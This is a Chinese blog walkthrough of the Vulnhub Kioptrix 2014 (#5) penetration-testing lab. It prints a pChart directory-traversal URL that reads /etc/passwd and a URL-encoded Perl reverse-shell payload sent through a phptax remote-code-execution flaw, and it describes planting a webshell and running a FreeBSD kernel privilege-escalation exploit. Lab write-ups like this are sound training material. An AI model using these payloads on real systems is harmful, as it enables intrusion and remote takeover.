Kioptrix-5

最新推荐文章于 2024-01-02 13:27:01 发布
最新推荐文章于 2024-01-02 13:27:01 发布
阅读量1k 收藏 22
点赞数 19
分类专栏: Vulnhub 文章标签: 网络安全 安全 学习 web安全 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44770698/article/details/135334999
版权
本文描述了在网络安全环境中进行渗透测试的过程,包括网络配置、使用Nmap进行信息收集、检测到Apache和PHP服务漏洞,特别是目录遍历和远程代码执行,以及后续的提权尝试和FreeBSD权限提升漏洞的利用。
摘要由CSDN通过智能技术生成

环境搭建

将原来的网络适配器删除掉,重新配置一个即可!

靶场下载地址:Kioptrix: 2014 (#5) ~ VulnHub

信息收集

nmap -sn 192.168.1.0/24 -oN live.port

发现存活主机为192.168.1.159,探测开放的端口信息:

# nmap -sT --min-rate 10000 -p- 192.168.1.159 -oN port.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-31 11:15 CST
Nmap scan report for 192.168.1.159
Host is up (0.0056s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE  SERVICE
22/tcp   closed ssh
80/tcp   open   http
8080/tcp open   http-proxy
MAC Address: 00:0C:29:35:B2:6F (VMware)

开放端口三个,分别是22 80 和8080端口,下面进行服务的详细信息探测:

# nmap -sT -sC -sV -O -p80,22,8080 192.168.1.159 -oN details.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-31 11:15 CST
Nmap scan report for 192.168.1.159
Host is up (0.00062s latency).

PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: Site doesn't have a title (text/html).
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
MAC Address: 00:0C:29:35:B2:6F (VMware)
Aggressive OS guesses: FreeBSD 9.3-RELEASE (89%), Vonage V-Portal VoIP adapter (89%), Cisco C370 Email Security Appliance (AsyncOS 8.0.1) (87%), Polycom SoundPoint IP 331 VoIP phone (87%), Orange Livebox wireless DSL router or Sagem F@st 334 or 3304 DSL router (86%), Sagem F@st 3302 DSL router (86%), FreeBSD 7.0-RELEASE (85%), FreeBSD 7.1-PRERELEASE 7.2-STABLE (85%), FreeBSD 7.2-RELEASE - 8.0-RELEASE (85%), m0n0wall 1.8.1 (FreeBSD 8.4) (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

收集到的信息为:Apache 2.2.21 php5.3.8

# Nmap 7.94 scan initiated Sun Dec 31 11:16:19 2023 as: nmap -sT --script=vuln -p80,22,8080 -oN vuln.nmap 192.168.1.159
Nmap scan report for 192.168.1.159
Host is up (0.00030s latency).

PORT     STATE  SERVICE
22/tcp   closed ssh
80/tcp   open   http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
8080/tcp open   http-proxy
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:35:B2:6F (VMware)

漏洞脚本信息探测的结果没什么有价值的信息,直接尝试在80端口上寻找突破点

渗透测试

尝试访问80端口上的服务:

看看源码信息,

注释中存在一个链接!尝试进行访问:

能看到很多的源码信息,这个pChart不知道是否存在相关的漏洞,尝试利用searchsploit进行搜索,看是否能得到有用的信息:

版本信息也对上了,存在多种漏洞,下载漏洞文件看一下都存在什么漏洞!

看到存在一个漏洞是目录遍历!尝试一下(XSS一般来说利用起来比较麻烦,所以这里的优先级拍后)

#利用已知的payload,进行尝试:
http://192.168.1.159/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

确实利用成功了,接下来呢?我们尝试去做一下目录的爆破,看看能不能收集到相关的文件,利用目录遍历漏洞进行源码的读取!

尝试读取apache的相关配置文件:

默认错误日志文件:/var/log/httpd-error.log
默认访问日志文件:/var/log/httpd-access.log
默认的suexec日志(如果使用suexec编译):/var/log/httpd-suexec.log
默认配置文件目录:/usr/local/etc/apache22 /和/usr/local/etc/apache22/extra /
默认配置文件:/usr/local/etc/apache22/httpd.conf

在配置文件的最下面发现了相关配置:

设置了UA,利用给出来的UA信息,尝试访问8080端口上的服务:

给出来了一个路径:phptax!

尝试进行点击之后,还是禁止访问!然后还是利用phptax搜索相关的漏洞,发现存在远程代码执行漏洞!

起msf,尝试漏洞的利用!

但是msf已知无法上线,不知道什么原因:

尝试手动利用!利用上面用searchsploit搜索出来的21665漏洞详情进行手动测试!

然后利用bp进行测试:

/phptax/drawimage.php?pfilez=xxx;perl+-e+'use+Socket%3b$i%3d"192.168.1.60"%3b$p%3d4444%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'&pdf=make

拿到shell之后便来到了提权的阶段!

提权

当前用户是www用户,查看/etc/passwd文件,发现并没有活跃的用户:

尝试上传一个linpeas,进行提权的信息收集:

发现很多的命令都是用不了的~ 这里还去尝试了另外一个漏洞!这里尝试去写马,先去连接一个蚁剑来上传文件!

这里找到了/usr/local/www/apache22/data/pChart2.1.3目录下面是有权限写的!然后就在这下面尝试写马:

尝试访问我们写入的木马:

执行成功!尝试链接蚁剑,上传辅助提权的文件:

给予执行权限,尝试利用提权辅助的脚本进行信息收集!找了一圈,尝试利用内核漏洞进行提权了,不知道是不是存在其他的方式,而不是内核漏洞:

利用searchsploit进行FreeBSD的搜索,发现存在权限提升的漏洞:

先尝试利用第一个 28718,下载后,利用蚁剑上传到目标靶机,进行编译:

查看漏洞源文件的时候,没发现具体的使用方法,就直接进行编译了:

报了警告,问题不大,不妨碍;已经生成了exp。直接执行:

发现提权成功!root目录下面存在最终的flag文件:

Y4y17
关注
专栏目录
Vulnhub系列-Kioptrix-Level-5
Yasso的博客
12-22 330
靶机:192.168.249.134 kali: 192.168.249.132 一、信息收集 ufs:/dev/ada0p2 —指定根分区启动系统 这样指定根分区启动成功 –靶机变为login才算打开— nmap -sV 192.168.249.134 —查看开放端口 —访问下80端口— <查看源代码> <看到URL访问下> —搜下有无pChart 2.1.3的漏洞— <貌似是个目录遍历漏洞和xss,看下exp怎么利用> 先玩玩XSS,刚开始以为是反射型 测试
vulnhub-Kioptrix: 2014 (#5) (考点:pchart/Apache/user-agent/phptax/perl)不用msf
冬萍子癸水
04-14 455
http://192.168.189.165/pChart2.1.3/examples/index.php?Action=View&Script=%2f…%2f…%2f%2f…%2f…%2fusr/local/etc/apache22/httpd.conf
KIOPTRIX: LEVEL 5通关详解
arcuied
04-12 542
通关详解
Kioptrix 2014 (#5)
MD@@nr丫卡uer
12-11 555
目标:Kioptrix 2014 (#5) 攻击机:kali(192.168.1.107) 网关:192.168.1.255 #1端口探测 nmap 192.168.1.159 -O -sV -sS -O 系统探测 -sV 探测开启的端口来获取服务、版本信息 -sS 使用SYN扫描 #2访问80和8080端口 查看网页源代码 访问 http://192.168.1.159/pChart2.1.3/examples/index.php 找一下Navigation漏.
Kioptrix 5 渗透流程
最新发布
braty_的博客
01-02 1065
可以看到操作系统为FreeBSD 9.0,存在root权限用户root和toor,普通用户ossec,ossecm和ossecr。使用搜索引擎搜索FreeBSD系统Apache的配置文件路径,得到默认配置文件路径为:/usr/local/etc/apache22/httpd.conf。最后面可以看到访问8080端口的agent是 Mozilla/4.0 Mozilla4_browser。发现对应的脚本,版本一致,是个路径穿越漏洞。我们利用 burp suite 抓包修改。kali和靶机都是nat的网卡。
Vulnhub系列-Kioptrix-Level-2
Yasso的博客
12-18 591
靶机: 192.168.249.130 kali: 192.168.249.129 一、信息收集 arp-scan -l nmap -sV 192.168.249.130—查看开放端口 ----访问下80端口---- 发现是个登录框先试试万能密码 username:admin' or 1=1# password:123(任意密码) 发现可以登陆,即存在sql注入 二、0x00漏洞利用(sql注入) sqlmap跑一下数据 登陆框抓包,因为sql注入在username处,在username处标记(减少测试时
Vulnhub系列-Kioptrix-Level-4
Yasso的博客
12-20 1866
靶机:192.168.249.133 kali:192.168.249.132 一、信息收集 nmap -sV 192.168.249.133 —查看开放端口 —查看下80端口— —是个登录框可能猜测sql注入漏洞— —在用户名和密码处*标记,sqlmap跑一下 sqlmap -r 1.txt --level 3 -risk 2 --batch -D members -T members -C password,username --dump—爆出用户名john密码MyNameIsJohn ssh
Vulnhub系列-Kioptrix-Level-3
Yasso的博客
12-19 1324
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
Kioptrix2-WalkThrough 靶机复现.docx
10-18
Kioptrix2-WalkThrough 靶机复现 本文将对 Kioptrix2 靶机复现的整个过程进行详细的...5. 提权:使用 CVE-2009-2698 漏洞来提权。 本文的靶机复现过程对新手来说非常友好,涉及到的技术点都非常基础,但非常实用。
Vulnhub-Hms?: 1渗透
laoyanCZ的博客
11-25 1074
对靶机进行全端口综合扫描。
curl 手册
fabbychips的专栏
03-09 3917
DESCRIPTION curl is a tool to transfer data from or to a server, using one of the supported protocols (DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP,
权限提升+权限维持+痕迹清理
weixin_52526216的博客
05-31 925
windows提权 IIS-USER—>administrator 本地提权 AT提权——win7 at 17:27 /interactive cmd.exe SC提权——win7和win2008、win2003 #sc 创建 服务名称 程序路径=空格"执行命令" 类型=空格own sc Create syscmd binPath= "cmd /K start" type= own type= interact #sc 启动 服务名称 sc start syscmd PSTools—
nmap扫描web应用漏洞,肉指令,mysql爆破
lvwuwei的博客
05-03 1618
最近时间充足,到晚上就总结回忆以下以前会的东西了,nmap是一个安全扫描的应用,可以扫描出web应用的漏洞,肉指令,mysql爆破等等,这些操作在lua语言编写的脚本里面,文件路径是: root@huangxudong-X456UR:/usr/share/nmap/scripts# pwd /usr/share/nmap/scripts root@huangxudong-X456UR:/usr/s...
网络攻防之DDOS(slowloris)
qq_34597894的博客
10-16 3471
描述: DDOS又称为分布式拒绝服务,全称是Distributed Denial of Service。DDOS本是利用合理的请求造成资源过载,导致服务不可用。比如一个停车场共有100车位,当100车位都停满后,再有车想要停进来,就必须等待已有的车先出去才行。如果已有的车一直不出去,那么停车场的入口就会排气长队,停车场的负荷过载,不能正常工作了,这种情况就是“拒绝服务”。 常...
Apache suEXEC Privilege Elevation / Information Disclosure
cnbird's blog
08-08 997
Apache suEXEC privilege elevation / information disclosure   Discovered by Kingcope/Aug 2013   The suEXEC feature provides Apache users the ability to run CGI and SSI programs under user IDs diff
浅谈Slowloris拒绝服务攻击
梦落红尘
10-30 1万+
DDOS又称为分布式拒绝服务,全称是Distributed Denial of Service。DDOS本是利用合理的请求造成资源过载,导致服务不可用。比如一个停车场共有100车位,当100车位都停满后,再有车想要停进来,就必须等待已有的车先出去才行。如果已有的车一直不出去,那么停车场的入口就会排气长队,停车场的负荷过载,不能正常工作了,这种情况就是“拒绝服务”。         常见的DD
nmap 扫描常见漏洞
热门推荐
hambaga的博客
11-09 1万+
加上 --script=vuln 参数就可以了 nmap -T4 -A -v 192.168.1.133 --script=vuln 扫描结果,发现了两个可用的漏洞 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-09 22:51 CST NSE: Loaded 149 scripts for scanning. NSE: Script Pr...
Kioptrix2靶场复现:SQL注入到权限提升详解
"Kioptrix2-WalkThrough 靶机复现文档详细记录了在Kali Linux环境下对Kioptrix Level 1-1.2靶机的渗透测试过程,包括信息收集、漏洞利用和权限提升等关键步骤。靶机主要开放了MySQL、SSH和HTTP服务,通过SQL注入攻破...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Y4y17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值